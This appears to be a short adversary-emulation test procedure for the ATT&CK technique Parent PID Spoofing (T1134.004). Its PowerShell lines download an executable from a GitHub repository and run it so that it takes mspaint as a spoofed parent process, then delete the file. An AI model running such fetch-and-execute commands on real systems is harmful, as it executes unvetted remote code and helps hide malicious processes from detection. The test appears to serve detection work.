Access Token Manipulation: Parent PID Spoofing    T1134.004


POWERSHELL
----------------------------------------------------
mspaint
Invoke-WebRequest -Uri https://github.com/PaulaMerino/TFM/raw/main/exec/parentPIDSpoofing.exe -OutFile "$env:USERPROFILE\Downloads\parentPIDSpoofing.exe"
& "$env:USERPROFILE\Downloads\parentPIDSpoofing.exe" (Get-Process | ?{$_.ProcessName -eq "mspaint"} | Select-Object -ExpandProperty Id)


CLEAN UP
Remove-Item "$env:USERPROFILE\Downloads\parentPIDSpoofing.exe"
----------------------------------------------------


